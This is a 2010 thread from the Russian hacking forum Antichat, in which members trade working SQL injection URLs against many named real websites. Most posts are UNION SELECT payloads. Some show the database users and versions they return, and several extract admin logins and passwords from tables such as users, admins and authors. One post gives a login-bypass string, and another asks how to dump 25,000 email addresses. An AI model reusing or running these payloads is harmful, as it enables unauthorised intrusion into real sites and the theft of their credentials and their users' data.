ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11401  
Старый 12.01.2010, 13:37
Аватар для Ctacok
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

http://www.oknet123.com/rubrique.php?id=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion(),@@version_compile_os),2,3,4,5,6,7--+
 
Ответить с цитированием

  #11402  
Старый 12.01.2010, 22:58
Аватар для Strilo4ka
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660

Репутация: 1148
По умолчанию

Цитата:
http://libserv.tspu.edu.ru/documentation/shou_dokument.php?id=-6+union+select+1,concat_ws%280x3a,user%28%29,versi on%28%29,database%28%29,@@version_compile_os%29,3, 4,5,6,7,8
Код:
polevivan@localhost:5.0.84-log:libserv:pc-linux-gnu
Цитата:
http://libserv.tspu.edu.ru/documentation/shou_dokument.php?id=-6+union+select+1,2,3,group_concat%28concat_ws%280x 40,login,password%29%20separator%200x3a%29,5,6,7,8 +FROM+Administrtion
Цитата:
http://libserv.tspu.edu.ru/documentation/shou_dokument.php?id=-6+union+select+1,2,3,group_concat%28concat_ws%280x 40,login,password%29%20separator%200x3a%29,5,6,7,8 +FROM+tspu1.administrtion
админки :
Цитата:
http://www.tspu.edu.ru/?ur=243&ur1=649
http://libserv.tspu.edu.ru/index1.php?ur1=93&ur=58
#2
Цитата:
http://construct.edu.ru/news.php?id=-62+union+select+1,2,3,4,5,concat_ws%280x3a,user%28 %29,version%28%29,database%28%29,@@version_compile _os%29,7,8--+
construct@localhost:5.1.39-log:constructortbld-freebsd7.2

Последний раз редактировалось Strilo4ka; 12.01.2010 в 23:06..
 
Ответить с цитированием

  #11403  
Старый 13.01.2010, 15:52
Аватар для warlok
warlok
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418

Репутация: 386
По умолчанию

Цитата:
http://www.tspu.edu.ru/?ur=243&ur1=649
тут еще кстате скл в авторизации
login: 'or+5=5/*
password: asdf
Цитата:
http://www.bla-bla-bla.ru/man/?id=-6+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4--
user_blablablaru@localhost:bla-bla-bla_ru:5.0.77
Цитата:
http://www.a1tv.ru/afisha/?city=135293+and+substring(version(),1,1)=5
сообщял им о скуле но никто незакрыл
 
Ответить с цитированием

  #11404  
Старый 14.01.2010, 15:34
Аватар для sqlinjector
sqlinjector
Новичок
Регистрация: 31.12.2009
Сообщений: 19
Провел на форуме:
60679

Репутация: 10
По умолчанию

Вот маг..
Цитата:
http://www.in2art.com/product_popup.php?prodID=-10486+union+select+1,2,3,group_concat(column_name, 0x3C62723E+SEPARATOR+0x0b),5,6,7,8,9,10,11,12,13,1 4+FROM+information_schema.columns+WHERE+table_sche ma=0x3435303739385F696E32617274+AND+table_name=0x6 D656D62657273--
Знатоки, подскажите, как выдрать целиком колонку, например, email.. там 25к адресов...
пишите в личку плз...
 
Ответить с цитированием

  #11405  
Старый 14.01.2010, 16:32
Аватар для sqlinjector
sqlinjector
Новичок
Регистрация: 31.12.2009
Сообщений: 19
Провел на форуме:
60679

Репутация: 10
По умолчанию

Истчо Маг
Цитата:
http://www.musicpalace.ru/?go=katalog&catid=82&podcatid=403&prodid=-33+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,group_concat%28table_name,0x3A+SEPARATOR+0x0b%2 9,34,35+FROM+information_schema.tables+WHERE+table _schema=0x623333373437--
 
Ответить с цитированием

  #11406  
Старый 15.01.2010, 00:17
Аватар для DezMond™
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию

Код:
http://www.euphonium.net/discography.php?cdID=-37+union+select+1,2,3,4,5,6,7,8+from+guestbook+--+
Код:
http://www.brettbaker.co.uk/main.php?s_id=Soloist&id=93&group=&video_id=-4+union+select+1,2,table_name,4,5,6+from+information_schema.tables+--+
Код:
http://www.6degreesfilm.com/reviews.php?id=-811'+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a3a,username,password),10,11,12,13,14,15,16,17,18,19,20,21,22+from+users+limit+2,1+--+
Код:
http://www.geardownload.com/reviews.php?id=-55399+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+FroM+members+/*+
Код:
http://www.truemetal.it/reviews.php?op=albumreview&id=-8529+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+information_schema.tables+--+
Код:
http://www.verletzte-helfer.de/reviews.php?op=printpage&artid=-70+union+select+username,password+from+user+limit+1,1+--+
Код:
http://www.welsh8ball.com/reviews.php?op=PrintReview&id=-4+union+select+1,2,3,4,5,6,7,8,9+--+
Код:
http://membres.multimania.fr/nomad3d/reviews.php?op=PrintReview&id=-1+union+select+1,concat_ws(0x3a3a,aid,pwd),3,4,5,6,7,8,9+from+mpn_authors+--+
Код:
http://www.macupdate.com/reviews.php?id=12331&pid=-121925+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a3a,id,perms),11,12,13,14,15,16,17,18,19,20,21+from+admins+--+
Код:
http://qclub.uk-pool.com/reviews.php?op=PrintReview&id=-1+union+select+1,2,concat_ws(0x3a3a,aid,pwd),4,5,6,7,8,9+from+mpn_authors+--+
Код:
http://www.matheplanet.com/default3.html?call=reviews.php?op=showcontent&id=-455+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15+from+authors+--+&ref=http%3A%2F%2Fwww.google.ru%
Код:
http://www.synfulpleasures.com/reviews.php?op=showcontent&id=-119+union+select+1,2,3,concat_ws(0x3a3a,username,password),5,6,7,8,9,10,11+from+user+limit+1,1+--+
Код:
http://gehnaindia.com/catalogue.php?CID=2&SCID=-2+union+select+1,concat_ws(0x3a3a,username,password),3,4,5,6+from+sitemanager+--+
Код:
http://www.psiconline.it/reviews.php?op=showcontent&id=-25+union+select+1,2,3,concat_ws(0x3a3a,aid,name,email,pwdion+select+1,2,email,4,password+from+admin+--+

Код:
http://www.hcandersen-paraden.dk/paraden.php?id=2&contentid=-6'+union+select+concat_ws(0x3a3a,id,brugernavn,kodeord)+from+loginadmin+--+
Код:
http://www.hypernova.dk/index.php?setpage=nyheder&setnewsid=-291'+union+select+1,2,3,4,5,6,7,8+--+
Код:
http://www.ksknet.dk/side/content.php?sektion=Holdene&id=-474'+union+select+1,2,3+from+users+--+
Код:
http://www.caddealer.com/computingsecurity/reviews.php?id=-36+uNiOn+sElEct+1,2,3,4,5,6,7,8,9,10+frOm+infOrmation_schema.tAbles+/*+
Код:
http://ffejournal.com/articles.php?book=-FFE+%238'+union+select+1,2,3,4,5,6,7,8,9+--+
Код:
http://biosilkeborg.dk/show-content.php?id=-1+union+select+1,concat_ws(0x3a3a,userID,username,password,AdministratorRights),3,4+from+users+where+AdministratorRights=1+--+
Код:
http://www.kirosydfyn.dk/dynamisk/spg_og_svar/16_spg.php?id=-34+union+select+1,2,3,4,5,6+--+
Код:
http://www.substral.se/?page=products&type=products_outdoor&id=-4'+union+select+1,2,3,4,5+from+information_schema.tables+--+&menu=1
Код:
http://scae.dk/index2.php?menuid=25&parent=-23+union+select+1,2,3,4,5,6,7,8,9,10,11+--+
Код:
http://www.soulportal.dk/reviews.php?op=showcontent&id=-701+union+select+1,2,3,concat_ws(0x3a3a,aid,name,email,pwd,radminsuper),5,6,7,8,9,10,11+from+authors+limit+4,1+--+
Код:
http://talkislam.org/ptiming/link_body.php?linkId=-12+union+select+1,2,usr_password+from+tbluser+--+
 
Ответить с цитированием

  #11407  
Старый 17.01.2010, 01:50
Аватар для RedX
RedX
Познающий
Регистрация: 12.06.2008
Сообщений: 32
Провел на форуме:
324402

Репутация: 22
Отправить сообщение для RedX с помощью ICQ
По умолчанию

Цитата:
http://www.go-sochi.ru/objinfo.php?prodId=28+UNION+SELECT+1,CONCAT_WS(0x3 a,Version(),Database(),User()),3,4+LIMIT+1,1--+
Database Version: 5.0.32-Debian_7etch11-log
Database name: mnemonic_gosochi
User name: mnemonic_gosochi@77.221.130.9
 
Ответить с цитированием

  #11408  
Старый 17.01.2010, 13:29
Аватар для RedX
RedX
Познающий
Регистрация: 12.06.2008
Сообщений: 32
Провел на форуме:
324402

Репутация: 22
Отправить сообщение для RedX с помощью ICQ
По умолчанию

Цитата:
http://www.newemotion.it/en/mobile_phone.php?ProdID=494+UNION+SELECT+1,2,3--
Database Version: 5.0.67-community
Database name: admin_new_emotion
User name: admin_alexandros@localhost
 
Ответить с цитированием

  #11409  
Старый 17.01.2010, 22:06
Аватар для sqlinjector
sqlinjector
Новичок
Регистрация: 31.12.2009
Сообщений: 19
Провел на форуме:
60679

Репутация: 10
По умолчанию

http://www.supportsolutions.co.za/job.php?job_id=-433+union+select+1,database(),3,4,5,6,7,8,9,10,11, 12,13,14,15,16--
 
Ответить с цитированием

  #11410  
Старый 17.01.2010, 22:28
Аватар для Strilo4ka
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660

Репутация: 1148
По умолчанию

Цитата:
http://www.traindisaster.ru/database.php?id=-1+union+select+1,concat_ws%280x3a,version%28%29,da tabase%28%29,user%28%29,@@version_compile_os%29,3, 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,3 9,40,41,42--+
5.0.67-log:u169104:u169104@10.10.153.197:unknown-freebsd6.3
Цитата:
http://rulada.ru/viewcross.php?cid=-70+union+select+1,2,concat_ws%280x3a,version%28%29 ,database%28%29,user%28%29,@@version_compile_os%29 ,4,5,6,7,8,9,10--+
5.0.32-Debian_7etch11-log:z86577_db:z86577_db@77.221.130.19c-linux-gnu

Цитата:
http://www.no-brand.ru/cloth/cloth.php?cid=282+union+select+1,2,3,4,5,6,7,8,9,1 0,11,12--+
Цитата:
http://www.berus.ru/catalog.php?cid=-26+union+select+1,version%28%29,3,4,5,6,7--+
Цитата:
http://spbrabota.org.ru/podvak.php?i_d=-146+union+select+1,version%28%29,3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23--+
Цитата:
http://ladydark.ru/page_02.php?uin=-60+union+select+1,2,version%28%29,4,5,6,7,8,9--+

Последний раз редактировалось Strilo4ka; 18.01.2010 в 00:21..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ